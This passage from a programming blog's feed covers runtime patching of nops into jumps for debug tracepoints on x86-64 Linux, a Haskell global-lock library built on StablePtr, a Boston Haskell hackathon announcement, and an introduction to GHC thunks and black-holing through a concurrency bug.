It also provides symbols <code>trace_table_start</code> and <code>trace_table_end</code> at the endpoints of this section.</p><h1 id="memory-protection">Memory protection</h1><p>Linux systems will prevent an application from overwriting its own code, for <a href="http://www.openbsd.org/papers/ven05-deraadt/mgp00009.html">good security reasons</a>, but we can explicitly override these permissions. Memory permissions are managed per <a href="http://en.wikipedia.org/wiki/Page_(computer_memory)">page</a> of memory. There's a <a href="http://www.kernel.org/doc/man-pages/online/pages/man3/sysconf.3.html">correct way</a> to determine the size of a page, but our code is terribly x86-specific anyway, so we'll hardcode the page size of 4096 bytes.</p><pre class="sourceCode"><code class="sourceCode c"><span class="ot">#define PAGE_SIZE 4096</span><br /><span class="ot">#define PAGE_OF(_addr) ( ((uint64_t) (_addr)) &amp; ~(PAGE_SIZE-1) )</span></code></pre><p>Then we can unprotect an arbitrary region of memory by calling <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/mprotect.2.html"><code>mprotect</code></a> for the appropriate page(s):</p><pre class="sourceCode"><code class="sourceCode c"><span class="dt">static</span> <span class="dt">void</span> unprotect(<span class="dt">void</span> *addr, size_t len) {<br /> <span class="dt">uint64_t</span> pg1 = PAGE_OF(addr),<br /> pg2 = PAGE_OF(addr + len - <span class="dv">1</span>);<br /> <span class="kw">if</span> (mprotect((<span class="dt">void</span> *) pg1, pg2 - pg1 + PAGE_SIZE,<br /> PROT_READ | PROT_EXEC | PROT_WRITE)) {<br /> perror(<span class="st">&quot;mprotect&quot;</span>);<br /> abort();<br /> }<br />}</code></pre><p>We're calling <code>mprotect</code> on a page which was not obtained from <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/mmap.2.html"><code>mmap</code></a>. 
POSIX does not define this behavior, but Linux specifically allows <code>mprotect</code> on any page except the <a href="http://transnum.blogspot.com/2009/01/linuxs-vsyscall.html">vsyscall page</a>.</p><h1 id="enabling-a-tracepoint">Enabling a tracepoint</h1><p>Now we need to implement the <code>enable</code> function:</p><pre class="sourceCode"><code class="sourceCode c"><span class="dt">void</span> enable(tracepoint *point);</code></pre><p>We will scan through the <code>trace_table</code> records looking for a matching <code>tracepoint</code> pointer. The C struct corresponding to a <code>trace_table</code> record is:</p><pre class="sourceCode"><code class="sourceCode c"><span class="kw">struct</span> trace_desc {<br /> tracepoint *point;<br /> <span class="dt">void</span> *jump_from;<br /> <span class="dt">void</span> *jump_to;<br />} __attribute__((packed));</code></pre><p>The <code>packed</code> attribute tells GCC not to insert any padding within or after these structs. This ensures that their layout will match the records we produced from assembly. 
Now we can implement a linear search through this table.</p><pre class="sourceCode"><code class="sourceCode c"><span class="dt">void</span> enable(tracepoint *point) {<br /> <span class="kw">extern</span> <span class="kw">struct</span> trace_desc trace_table_start[], trace_table_end[];<br /> <span class="kw">struct</span> trace_desc *desc;<br /> <span class="kw">for</span> (desc = trace_table_start; desc &lt; trace_table_end; desc++) {<br /> <span class="kw">if</span> (desc-&gt;point != point)<br /> <span class="kw">continue</span>;<br /><br /> <span class="dt">int64_t</span> offset = (desc-&gt;jump_to - desc-&gt;jump_from) - <span class="dv">5</span>;<br /> <span class="kw">if</span> ((offset &gt; INT32_MAX) || (offset &lt; INT32_MIN)) {<br /> fprintf(stderr, <span class="st">&quot;offset too big: %lx</span><span class="ch">\n</span><span class="st">&quot;</span>, offset);<br /> abort();<br /> }<br /><br /> <span class="dt">int32_t</span> offset32 = offset;<br /> <span class="dt">unsigned</span> <span class="dt">char</span> *dest = desc-&gt;jump_from;<br /> unprotect(dest, <span class="dv">5</span>);<br /> dest[<span class="dv">0</span>] = <span class="bn">0xe9</span>;<br /> memcpy(dest<span class="dv">+1</span>, &amp;offset32, <span class="dv">4</span>);<br /> }<br />}</code></pre><p>We enable a tracepoint by overwriting its <code>nop</code> with an unconditional jump. The opcode is <code>0xe9</code>. The operand is a 32-bit displacement, interpreted relative to the instruction <em>after</em> the jump. <code>desc-&gt;jump_from</code> points to the beginning of what will be the jump instruction, so we subtract 5 from the displacement. Then we unprotect memory and write the new bytes into place.</p><p>That's everything. 
You can grab all of this code from <a href="https://github.com/kmcallister/tracepoints">GitHub</a>, including a simple test program.</p><h1 id="pitfalls">Pitfalls</h1><p>Where to start?</p><p>This code is extremely non-portable, relying on details of x86-64, Linux, and specific recent versions of the GNU C compiler and assembler. The idea can be ported to other platforms, with some care. For example, ARM processors require an <a href="http://lxr.linux.no/linux+v3.1/arch/arm/include/asm/cacheflush.h#L176">instruction cache flush</a> after writing to code. Linux on ARM <a href="http://lxr.linux.no/linux+v3.1/arch/arm/kernel/traps.c#L502">implements</a> the <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/cacheflush.2.html"><code>cacheflush</code> system call</a> for this purpose.</p><p>Our code is not thread-safe, either. If one thread reaches a <code>nop</code> while it is being overwritten by another thread, the result will surely be a crash or other horrible bug. The <a href="http://www.ksplice.com/doc/ksplice.pdf">Ksplice paper</a> [PDF] discusses how to prevent this, in the context of <a href="http://www.ksplice.com/">live-patching the Linux kernel</a>.</p><p>Is it worth opening this can of worms in order to improve performance a little? In general, no. Obviously we'd have to measure the performance difference to be sure. But for most projects, concerns of maintainability and avoiding bugs will preclude tricky hacks like this one.</p><p>The Linux kernel is under extreme demands for both performance and flexibility. It's part of every application on a huge number of systems, so any small performance improvement has a large aggregate effect. And those systems are incredibly diverse, making it likely that <em>someone</em> will see a large difference. Finally, kernel development will always involve tricky low-level code as a matter of course. 
The infrastructure is already there to support it — both software infrastructure and knowledgeable developers.</p>http://mainisusuallyafunction.blogspot.com/2011/11/self-modifying-code-for-debug-tracing.htmlnoreply@blogger.com (keegan)8tag:blogger.com,1999:blog-1563623855220143059.post-7529328850122408321Fri, 04 Nov 2011 11:22:00 +00002011-11-04T05:00:18.554-07:00ccodeglobal-lockhaskellGlobal locking through StablePtr<p>I spoke before of using <a href="http://mainisusuallyafunction.blogspot.com/2011/10/safe-top-level-mutable-variables-for.html">global locks in Haskell</a> to protect a thread-unsafe C library. And I wrote about a <a href="http://mainisusuallyafunction.blogspot.com/2011/10/thunks-and-lazy-blackholes-introduction.html">GHC bug</a> which breaks the most straightforward way to get a global lock.</p><p>My new solution is to store an <a href="http://lambda.haskell.org/hp-tmp/docs/2011.2.0.0/ghc-doc/libraries/base-4.3.1.0/Control-Concurrent-MVar.html"><code>MVar</code></a> lock in a C global variable via <a href="http://lambda.haskell.org/hp-tmp/docs/2011.2.0.0/ghc-doc/libraries/haskell2010-1.0.0.0/Foreign-StablePtr.html"><code>StablePtr</code></a>. I've implemented this, and it seems to work. I'd appreciate if people could bang on this code and report any issues.</p><p>You can get the library from <a href="http://hackage.haskell.org/package/global-lock">Hackage</a> or browse <a href="https://github.com/kmcallister/global-lock">the source</a>, including a <a href="https://github.com/kmcallister/global-lock/blob/master/test/counter.hs">test program</a>. 
You can also use this code as a template for including a similar lock in your own Haskell project.</p><h1 id="the-c-code">The C code</h1><p>On <a href="https://github.com/kmcallister/global-lock/blob/master/cbits/global.c">the C side</a>, we declare a global variable and a function to read that variable.</p><pre class="sourceCode"><code class="sourceCode c"><span class="dt">static</span> <span class="dt">void</span>* global = <span class="dv">0</span>;<br /><br /><span class="dt">void</span>* hs_globalzmlock_get_global(<span class="dt">void</span>) {<br /> <span class="kw">return</span> global;<br />}</code></pre><p>To avoid name clashes, I gave this function a long name based on the <a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Compiler/SymbolNames">z-encoding</a> of my package's name. The variable named <code>global</code> will not conflict with another compilation unit, because it's declared <code>static</code>.</p><p>Another C function will set this variable, if it was previously 0. Two threads might execute this code concurrently, so we use a GCC <a href="http://gcc.gnu.org/onlinedocs/gcc/Atomic-Builtins.html">built-in for atomic memory access</a>.</p><pre class="sourceCode"><code class="sourceCode c"><span class="dt">int</span> hs_globalzmlock_set_global(<span class="dt">void</span>* new_global) {<br /> <span class="dt">void</span>* old = __sync_val_compare_and_swap(&amp;global, <span class="dv">0</span>, new_global);<br /> <span class="kw">return</span> (old == <span class="dv">0</span>);<br />}</code></pre><p>If <code>old</code> is not 0, then someone has already set <code>global</code>, and our assignment was dropped. 
We report this condition to the caller.</p><h1 id="foreign-imports">Foreign imports</h1><p>On <a href="https://github.com/kmcallister/global-lock/blob/master/System/GlobalLock/Internal.hs">the Haskell side</a>, we import these C functions.</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">foreign import ccall unsafe</span> <span class="st">&quot;hs_globalzmlock_get_global&quot;</span><br /><span class="ot"> c_get_global </span><span class="ot">::</span> <span class="dt">IO</span> (<span class="dt">Ptr</span> ())<br /><br /><span class="kw">foreign import ccall</span> <span class="st">&quot;hs_globalzmlock_set_global&quot;</span><br /><span class="ot"> c_set_global </span><span class="ot">::</span> <span class="dt">Ptr</span> () <span class="ot">-&gt;</span> <span class="dt">IO</span> <span class="dt">CInt</span></code></pre><p>The <code>unsafe</code> import of <code>c_get_global</code> demands justification. This wrinkle arises from the fact that GHC runs many Haskell threads on the same OS thread. A long-running foreign call from that OS thread might <a href="http://blog.ezyang.com/2010/07/safety-first-ffi-and-threading/">block unrelated Haskell code</a>. GHC prevents this by moving the foreign call and/or other Haskell threads to a different OS thread. This adds latency to the foreign call — about 100 nanoseconds in my tests.</p><p>In most cases a 100 ns overhead is negligible. But it matters for functions which are guaranteed to return in a very short amount of time. And blocking other Haskell threads during such a short call is fine. Marking the import <code>unsafe</code> tells GHC to ignore the blocking concern, and generate a direct C function call.</p><p>Our function <code>c_get_global</code> is a good use case for <code>unsafe</code>, because it simply returns a global variable. 
In my <a href="https://github.com/kmcallister/global-lock/blob/master/test/bench.hs">tests</a>, adding <code>unsafe</code> decreased the overall latency of locking by about 50%. We cannot use <code>unsafe</code> with <code>c_set_global</code> because, in the worst case, GCC implements atomic operations with blocking library functions. That's okay because <code>c_set_global</code> will only be called a few times anyway.</p><h1 id="the-haskell-code">The Haskell code</h1><p>Now we have access to a C global of type <code>void*</code>, and we want to store a Haskell value of type <code>MVar ()</code>. The <a href="http://lambda.haskell.org/hp-tmp/docs/2011.2.0.0/ghc-doc/libraries/haskell2010-1.0.0.0/Foreign-StablePtr.html"><code>StablePtr</code></a> module is just what we need. A <code>StablePtr</code> is a reference to some Haskell expression, which can be converted to <code>Ptr ()</code>, aka <code>void*</code>. There is no guarantee about this <code>Ptr ()</code> value, except that it can be converted back to the original <code>StablePtr</code>.</p><p>Here's how we store an <code>MVar</code>:</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">set </span><span class="ot">::</span> <span class="dt">IO</span> ()<br />set <span class="fu">=</span> <span class="kw">do</span><br /> mv <span class="ot">&lt;-</span> newMVar ()<br /> ptr <span class="ot">&lt;-</span> newStablePtr mv<br /> ret <span class="ot">&lt;-</span> c_set_global (castStablePtrToPtr ptr)<br /> when (ret <span class="fu">==</span> <span class="dv">0</span>) <span class="fu">$</span><br /> freeStablePtr ptr</code></pre><p>It's fine for two threads to enter <code>set</code> concurrently. In one thread, the assignment will be dropped, and <code>c_set_global</code> will return 0. In that case we free the unused <code>StablePtr</code>, and the <code>MVar</code> will eventually be garbage-collected. 
<code>StablePtr</code>s must be freed manually, because the GHC garbage collector can't tell if some C code has stashed away the corresponding <code>void*</code>.</p><p>Now we can retrieve the <code>MVar</code>, or create it if necessary.</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">get </span><span class="ot">::</span> <span class="dt">IO</span> (<span class="dt">MVar</span> ())<br />get <span class="fu">=</span> <span class="kw">do</span><br /> p <span class="ot">&lt;-</span> c_get_global<br /> <span class="kw">if</span> p <span class="fu">==</span> nullPtr<br /> <span class="kw">then</span> set <span class="fu">&gt;&gt;</span> get<br /> <span class="kw">else</span> deRefStablePtr (castPtrToStablePtr p)</code></pre><p>In the common path, we do an unsynchronized read on the global variable. Only if the variable appears to contain <code>NULL</code> do we allocate an <code>MVar</code>, perform a synchronized compare-and-swap, etc. This keeps overhead low, and makes this library suitable for fine-grained locking.</p><p>All that's left is the user-visible locking interface:</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">lock </span><span class="ot">::</span> <span class="dt">IO</span> a <span class="ot">-&gt;</span> <span class="dt">IO</span> a<br />lock act <span class="fu">=</span> get <span class="fu">&gt;&gt;=</span> <span class="fu">flip</span> withMVar (<span class="fu">const</span> act)</code><br /><br /></pre><h1 id="inspecting-the-machine-code">Inspecting the machine code</h1><p>Just for fun, let's see how GCC implements <code>__sync_val_compare_and_swap</code> on the AMD64 architecture.</p><pre><code><span class="Prompt">$</span> <span class="Entry">objdump -d dist/build/cbits/global.o</span><br />...<br />0000000000000010 &lt;hs_globalzmlock_set_global&gt;:<br /> 10: 31 c0 xor %eax,%eax<br /> 12: f0 48 0f b1 3d 00 00 lock cmpxchg %rdi,0x0(%rip)<br /> 19: 00 00<br />....<br /></code></pre><p>This 
<code>lock cmpxchg</code> is the same instruction used by the <a href="http://hackage.haskell.org/trac/ghc/browser/includes/stg/SMP.h?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L165">GHC runtime system</a> for its own atomic compare-and-swap. The offset on the operand <code>0x0(%rip)</code> will be <a href="http://www.iecc.com/linker/linker07.html">relocated</a> to point at <code>global</code>.</p>http://mainisusuallyafunction.blogspot.com/2011/11/global-locking-through-stableptr.htmlnoreply@blogger.com (keegan)0tag:blogger.com,1999:blog-1563623855220143059.post-3577785425903756888Thu, 03 Nov 2011 10:47:00 +00002011-11-03T03:47:09.281-07:00bostonhackathonhaskellHaskell hackathon in the Boston area, January 20 to 22<p>The global sensation that is the <a href="http://haskell.org/haskellwiki/Hackathon">Haskell Hackathon</a> is coming to the Boston area. <a href="http://haskell.org/haskellwiki/Hac_Boston">Hac Boston</a> will be held <strong>January 20 to 22, 2012</strong> in <strong>Cambridge, Massachusetts</strong>. It's open to all; you do not need to be a Haskell guru to attend. All you need is a basic knowledge of Haskell, a willingness to learn, and a <a href="http://haskell.org/haskellwiki/Hac_Boston/Projects">project</a> you're excited to help with (or a project of your own to work on).</p><p>Spaces are filling up, so be sure to <a href="http://haskell.org/haskellwiki/Hac_Boston/Register">register</a> if you plan on coming. You can also coordinate <a href="http://haskell.org/haskellwiki/Hac_Boston/Projects">projects</a> on the HaskellWiki.</p><p><a href="http://mit.edu/">MIT</a> is providing space (exact room to be determined) and <a href="https://www.capitaliq.com/">Capital IQ</a> is sponsoring the event. In addition to coding, there will be food and some short talks. I'm interested in giving a ~20 minute talk of some kind, with slides also available online. 
What would people like to hear about?</p>http://mainisusuallyafunction.blogspot.com/2011/11/haskell-hackathon-in-boston-area.htmlnoreply@blogger.com (keegan)0tag:blogger.com,1999:blog-1563623855220143059.post-7170898440757064828Mon, 31 Oct 2011 07:17:00 +00002011-10-31T00:17:50.974-07:00cghchaskellrtsThunks and lazy blackholes: an introduction to GHC at runtime<p>This article is about a <a href="http://haskell.org/ghc/">GHC</a> bug I encountered recently, but it's really an excuse to talk about some GHC internals at an intro level. (In turn, an excuse for me to learn about those internals.)</p><p>I'll assume you're familiar with the basics of Haskell and lazy evaluation.</p><h1 id="the-bug">The bug</h1><p>I spoke <a href="http://mainisusuallyafunction.blogspot.com/2011/10/safe-top-level-mutable-variables-for.html">before</a> of using global locks in Haskell to protect a thread-unsafe C library. Unfortunately a <a href="http://hackage.haskell.org/trac/ghc/ticket/5558">GHC bug</a> prevents this from working. 
Using <code>unsafePerformIO</code> at the top level of a file can result in IO that happens more than once.</p><p>Here is a simple program which illustrates the problem:</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">import</span> <span class="dt">Control.Concurrent</span><br /><span class="kw">import</span> <span class="dt">Control.Monad</span><br /><span class="kw">import</span> <span class="dt">System.IO.Unsafe</span><br /><br /><span class="ot">ioThunk </span><span class="ot">::</span> ()<br />ioThunk <span class="fu">=</span> unsafePerformIO <span class="fu">$</span> <span class="kw">do</span><br /> me <span class="ot">&lt;-</span> myThreadId<br /> <span class="fu">putStrLn</span> (<span class="st">&quot;IO executed by &quot;</span> <span class="fu">++</span> <span class="fu">show</span> me)<br /><span class="ot">{-# NOINLINE ioThunk #-}</span><br /><br /><span class="ot">main </span><span class="ot">::</span> <span class="dt">IO</span> ()<br />main <span class="fu">=</span> <span class="kw">do</span><br /> replicateM_ <span class="dv">100</span> (forkIO (<span class="fu">print</span> ioThunk))<br /> threadDelay <span class="dv">10000</span> <span class="co">-- wait for other threads</span></code></pre><p>Let's test this, following the <a href="http://lambda.haskell.org/hp-tmp/docs/2011.2.0.0/ghc-doc/libraries/base-4.3.1.0/System-IO-Unsafe.html#v:unsafePerformIO">compiler flag recommendations</a> for <code>unsafePerformIO</code>.</p><pre><code><span class="Prompt">$</span> <span class="Entry">ghc -V</span><br />The Glorious Glasgow Haskell Compilation System, version 7.2.1<br /><br /><span class="Prompt">$</span> <span class="Entry">ghc -rtsopts -threaded -fno-cse -fno-full-laziness dupe.hs</span><br />[1 of 1] Compiling Main ( dupe.hs, dupe.o )<br />Linking dupe ...<br /><br /><span class="Prompt">$</span> <span class="Entry">while true; do ./dupe +RTS -N | head -n 2; echo ----; done</span><br /></code></pre><p>Within a few 
seconds I see output like this:</p><pre><code>----<br />IO executed by ThreadId 35<br />()<br />----<br />IO executed by ThreadId 78<br />IO executed by ThreadId 85<br />----<br />IO executed by ThreadId 48<br />()<br />----<br /></code></pre><p>In the middle run, two threads executed the IO action.</p><p>This bug was <a href="http://hackage.haskell.org/trac/ghc/ticket/5558">reported</a> two weeks ago and is already <a href="http://hackage.haskell.org/trac/ghc/changeset/96c80d34163fd422cbc18f4532b7556212a554b8">fixed</a> in GHC HEAD. I tested with GHC 7.3.20111026, aka <code>g6f5b798</code>, and the problem seemed to go away.</p><p>Unfortunately it will be some time before GHC 7.4 is widely deployed, so I'm thinking about workarounds for my original global locking problem. I'll probably store the lock in a C global variable via <a href="http://lambda.haskell.org/hp-tmp/docs/2011.2.0.0/ghc-doc/libraries/haskell2010-1.0.0.0/Foreign-StablePtr.html"><code>StablePtr</code></a>, or failing that, implement all locking in C. But I'd appreciate any other suggestions.</p><p>The remainder of this article is an attempt to explain this GHC bug, and the fix committed by Simon Marlow. It's long because</p><ul class="incremental"><li><p>I try not to assume you know anything about how GHC works. I don't know very much, myself.</p></li><li><p>There are various digressions.</p></li></ul><h1 id="objects-at-runtime">Objects at runtime</h1><p>Code produced by GHC can allocate <a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Rts/Storage/HeapObjects#Typesofobject">many kinds of objects</a>. Here are just a few:</p><ul class="incremental"><li><p><a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Rts/Storage/HeapObjects#DataConstructors"><strong><code>CONSTR</code></strong></a> objects represent algebraic data constructors and their associated fields. 
The value <code>(Just 'x')</code> would be represented by a <code>CONSTR</code> object, holding a pointer to another object representing <code>'x'</code>.</p></li><li><p><a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Rts/Storage/HeapObjects#FunctionClosures"><strong><code>FUN</code></strong></a> objects represent functions, like the value <code>(\x -&gt; x+1)</code>.</p></li><li><p><a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Rts/Storage/HeapObjects#Thunks"><strong><code>THUNK</code></strong></a> objects represent computations which have not yet happened. Suppose we write:</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">let</span> x <span class="fu">=</span> <span class="dv">2</span> <span class="fu">+</span> <span class="dv">2</span> <span class="kw">in</span> f x x</code></pre><p>This code will construct a <code>THUNK</code> object for <code>x</code> and pass it to the code for <code>f</code>. Some time later, <code>f</code> may force evaluation of its argument, and the thunk will, in turn, invoke <code>(+)</code>. When the thunk has finished evaluating, it is overwritten with the evaluation result. (Here, this might be an <a href="http://lambda.haskell.org/hp-tmp/docs/2011.2.0.0/ghc-doc/libraries/ghc-prim-0.2.0.0/GHC-Types.html#t:Int"><code>I#</code></a> <code>CONSTR</code> holding the number 4.) If <code>f</code> then forces its second argument, which is <em>also</em> <code>x</code>, the work done by <code>(+)</code> is not repeated. This is the essence of lazy evaluation.</p></li><li><p>When a thunk is forced, it's first overwritten with a <strong><code>BLACKHOLE</code></strong> object. This <code>BLACKHOLE</code> is eventually replaced with the evaluation result. Therefore a <code>BLACKHOLE</code> represents a thunk which is currently being evaluated.</p><p>Identifying this case helps the garbage collector, and it also gives GHC its seemingly magical ability to detect some infinite loops. 
Forcing a <code>BLACKHOLE</code> indicates a computation which cannot proceed until the same computation has finished. The GHC runtime will terminate the program with a <code>&lt;&lt;loop&gt;&gt;</code> exception.</p></li><li><p>We can't truly update thunks in place, because the evaluation result might be larger than the space originally allocated for the thunk. So we write an indirection pointing to the evaluation result. These <a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Rts/Storage/HeapObjects#Indirections"><strong><code>IND</code></strong></a> objects will later be removed by the garbage collector.</p></li></ul><h1 id="static-objects">Static objects</h1><p>Dynamically-allocated objects make sense for values which are created as your program runs. But the top-level declarations in a Haskell module don't need to be dynamically allocated; they already exist when your program starts up. GHC allocates these <a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Rts/Storage/HeapObjects#Staticobjects">static objects</a> in your executable's data section, the same place where C global variables live.</p><p>Consider this program:</p><pre class="sourceCode"><code class="sourceCode haskell">x <span class="fu">=</span> <span class="kw">Just</span> <span class="ch">'x'</span><br /><br />f (<span class="kw">Just</span> _) <span class="fu">=</span> \y <span class="ot">-&gt;</span> y<span class="fu">+</span><span class="dv">1</span><br /><br />main <span class="fu">=</span> <span class="fu">print</span> (f x <span class="dv">3</span>)</code></pre><p>Ignoring optimizations, GHC will produce code where:</p><ul class="incremental"><li><p><code>x</code> is a <code>CONSTR_STATIC</code> object.</p></li><li><p><code>f</code> is a <code>FUN_STATIC</code> object. When called, <code>f</code> will return a dynamically-allocated <code>FUN</code> object representing <code>(\y -&gt; y+1)</code>.</p></li><li><p><code>main</code> is a <code>THUNK_STATIC</code> object. 
It represents the unevaluated expression formed by applying the function <code>print</code> to the argument <code>(f x 3)</code>. A static thunk is also known as a <a href="http://www.haskell.org/haskellwiki/Constant_applicative_form">constant applicative form</a>, or a CAF for short. Like any other thunk, a CAF may or may not get evaluated. If evaluated, it will be replaced with a black hole and eventually the evaluation result. In this example, <code>main</code> will be evaluated by the runtime system, in deciding what IO to perform.</p></li></ul><h1 id="black-holes-and-revelations">Black holes and revelations</h1><p>That's all fine for a single-threaded Haskell runtime, but GHC supports running many Haskell threads across multiple OS threads. This introduces some additional complications. For example, one thread might force a thunk which is currently being evaluated by another thread. The thread will find a <code>BLACKHOLE</code>, but terminating the program would be incorrect. Instead the <code>BLACKHOLE</code> puts the current Haskell thread to sleep, and wakes it up when the evaluation result is ready.</p><p>If two threads force the same thunk at the same time, they will both perform the deferred computation. We could avoid this wasted effort by writing and checking for black holes using expensive atomic memory operations. But this is a poor tradeoff; we slow down <em>every</em> evaluation in order to prevent a rare race condition.</p><p>As a compiler for a language with pure evaluation, GHC has the luxury of tolerating some duplicated computation. Evaluating an expression twice can't change a program's behavior. And most thunks are cheap to evaluate, hardly worth the effort of avoiding duplication. So GHC follows a &quot;lazy black-holing&quot; strategy.<sup><a href="#x1fn1" class="footnoteRef" id="x1fnref1">1</a></sup><sup><a href="#x1fn2" class="footnoteRef" id="x1fnref2">2</a></sup> Threads write black holes only when they enter the garbage collector. 
If a thread discovers that one of its thunks has already been claimed, it will abandon the duplicated work-in-progress. This scheme avoids large wasted computations without paying the price on small computations. You can find the gritty details within the function <a href="http://hackage.haskell.org/trac/ghc/browser/rts/ThreadPaused.c?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L171"><code>threadPaused</code></a>, in <code>rts/ThreadPaused.c</code>.</p><h1 id="unsafedupableperformio"><code>unsafe[Dupable]PerformIO</code></h1><p>You may remember that we started, all those many words ago, with a program that uses <code>unsafePerformIO</code>. This breaks the pure-evaluation property of Haskell. Repeated evaluation will affect semantics! Might lazy black-holing be the culprit in the original bug?</p><p>Naturally, the GHC developers thought about this case. Here's the <a href="http://hackage.haskell.org/packages/archive/base/4.4.0.0/doc/html/src/GHC-IO.html#unsafePerformIO">implementation of <code>unsafePerformIO</code></a>:</p><pre class="sourceCode"><code class="sourceCode haskell">unsafePerformIO m <span class="fu">=</span> unsafeDupablePerformIO (noDuplicate <span class="fu">&gt;&gt;</span> m)<br /><br />noDuplicate <span class="fu">=</span> <span class="dt">IO</span> <span class="fu">$</span> \s <span class="ot">-&gt;</span> <span class="kw">case</span> noDuplicate# s <span class="kw">of</span> s' <span class="ot">-&gt;</span> (# s', () #)<br /><br />unsafeDupablePerformIO (<span class="dt">IO</span> m) <span class="fu">=</span> lazy (<span class="kw">case</span> m realWorld# <span class="kw">of</span> (# _, r #) <span class="ot">-&gt;</span> r)</code></pre><p>The core behavior is implemented by <a href="http://hackage.haskell.org/packages/archive/base/4.4.0.0/doc/html/src/GHC-IO.html#unsafeDupablePerformIO"><code>unsafeDupablePerformIO</code></a>, using GHC's internal representation of IO actions (which is beyond the scope of this article, to the extent I even 
have a scope in mind). As the name suggests, <code>unsafeDupablePerformIO</code> provides no guarantee against duplicate execution. The more familiar <code>unsafePerformIO</code> builds this guarantee by first invoking the <code>noDuplicate#</code> primitive operation.</p><p>The <a href="http://hackage.haskell.org/trac/ghc/browser/rts/PrimOps.cmm?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L1904">implementation of <code>noDuplicate#</code></a>, written in GHC's <a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Compiler/CmmType"><code>Cmm</code></a> intermediate language, handles a few tricky considerations. But it's basically a call to the function <code>threadPaused</code>, which we saw is responsible for lazy black-holing. In other words, thunks built from <code>unsafePerformIO</code> perform eager black-holing.</p><p>Since <code>threadPaused</code> has to walk the evaluation stack, <code>unsafeDupablePerformIO</code> might be much faster than <code>unsafePerformIO</code>. In practice, this will matter when performing a great number of very quick IO actions, like <a href="http://lambda.haskell.org/hp-tmp/docs/2011.2.0.0/ghc-doc/libraries/haskell2010-1.0.0.0/Foreign-Storable.html#v:peek"><code>peek</code></a>ing a single byte from memory. In this case it is safe to duplicate IO, provided the buffer is unchanging. 
Let's measure the performance difference.</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">import</span> <span class="dt">GHC.IO</span><br /><span class="kw">import</span> <span class="dt">Foreign</span> <span class="kw">hiding</span> (unsafePerformIO)<br /><span class="kw">import</span> <span class="dt">System.Random</span><br /><span class="kw">import</span> <span class="dt">Criterion.Main</span><br /><br />main <span class="fu">=</span> <span class="kw">do</span><br /> <span class="kw">let</span> sz <span class="fu">=</span> <span class="dv">1024</span><span class="fu">*</span><span class="dv">1024</span><br /> buf <span class="ot">&lt;-</span> mallocBytes sz<br /> <span class="kw">let</span> get i <span class="fu">=</span> peekByteOff buf<span class="ot"> i </span><span class="ot">::</span> <span class="dt">IO</span> <span class="dt">Word8</span><br /> peek_d i <span class="fu">=</span> unsafeDupablePerformIO (get i)<br /> peek_n i <span class="fu">=</span> unsafePerformIO (get i)<br /> idxes <span class="fu">=</span> <span class="fu">take</span> <span class="dv">1024</span> <span class="fu">$</span> randomRs (<span class="dv">0</span>, sz<span class="fu">-</span><span class="dv">1</span>) (mkStdGen <span class="dv">49</span>)<br /> evaluate (<span class="fu">sum</span> idxes) <span class="co">-- force idxes ahead of time</span><br /> defaultMain<br /> [ bench <span class="st">&quot;dup&quot;</span> <span class="fu">$</span> nf (<span class="fu">map</span> peek_d) idxes<br /> , bench <span class="st">&quot;noDup&quot;</span> <span class="fu">$</span> nf (<span class="fu">map</span> peek_n) idxes ]</code></pre><p>And the results:</p><pre><code><span class="Prompt">$</span> <span class="Entry">ghc -rtsopts -threaded -O2 peek.hs &amp;&amp; ./peek +RTS -N</span><br />...<br /><br />benchmarking dup<br />mean: 76.42962 us, lb 75.11134 us, ub 78.18593 us, ci 0.950<br />std dev: 7.764123 us, lb 6.300310 us, ub 9.790345 us, ci 0.950<br /><br 
/>benchmarking noDup<br />mean: 142.1720 us, lb 139.7312 us, ub 145.4300 us, ci 0.950<br />std dev: 14.43673 us, lb 11.40254 us, ub 17.86663 us, ci 0.950<br /></code></pre><p>So performance-critical <a href="http://en.wikipedia.org/wiki/Idempotence">idempotent</a> actions can benefit from <code>unsafeDupablePerformIO</code>. But most code should use the safer <code>unsafePerformIO</code>, as our bug reproducer does. And the <code>noDuplicate#</code> machinery for <code>unsafePerformIO</code> makes sense, so what's causing our bug?</p><h1 id="the-bug-finally">The bug, finally</h1><p>After all those details and diversions, let's go back to <a href="http://hackage.haskell.org/trac/ghc/changeset/96c80d34163fd422cbc18f4532b7556212a554b8">the fix</a> for <a href="http://hackage.haskell.org/trac/ghc/ticket/5558">GHC bug #5558</a>. The action is mostly in <a href="http://hackage.haskell.org/trac/ghc/changeset/96c80d34163fd422cbc18f4532b7556212a554b8/rts/sm/Storage.c"><code>rts/sm/Storage.c</code></a>. This file is part of GHC's <a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Rts/Storage">storage manager</a>, which provides services such as garbage collection.</p><p>Recall that our problematic code looked like this:</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">ioThunk </span><span class="ot">::</span> ()<br />ioThunk <span class="fu">=</span> unsafePerformIO <span class="fu">$</span> <span class="kw">do</span> <span class="fu">...</span></code></pre><p>This is an application of the function <code>($)</code> to the argument <code>unsafePerformIO</code>. So it's a static thunk, a CAF. 
